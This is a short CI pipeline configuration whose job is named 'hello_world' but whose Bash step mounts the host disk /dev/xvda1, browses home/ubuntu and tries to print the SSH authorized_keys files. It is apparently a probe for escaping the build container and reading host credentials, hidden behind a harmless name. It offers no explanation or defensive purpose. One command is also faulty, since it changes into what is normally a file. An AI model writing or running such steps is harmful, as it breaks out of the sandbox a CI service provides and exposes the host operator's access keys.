pipelines:
  - name: hello_world
    steps:
      - name: say_hello
        type: Bash
        execution:
          onExecute:
            - uname -a
            - mkdir /mnt/host; 
            - mount /dev/xvda1 /mnt/host/;
            - cd /mnt/host/
            - cd home/ubuntu
            - ls -a
            - cd .ssh/authorized_keys
            - cat *
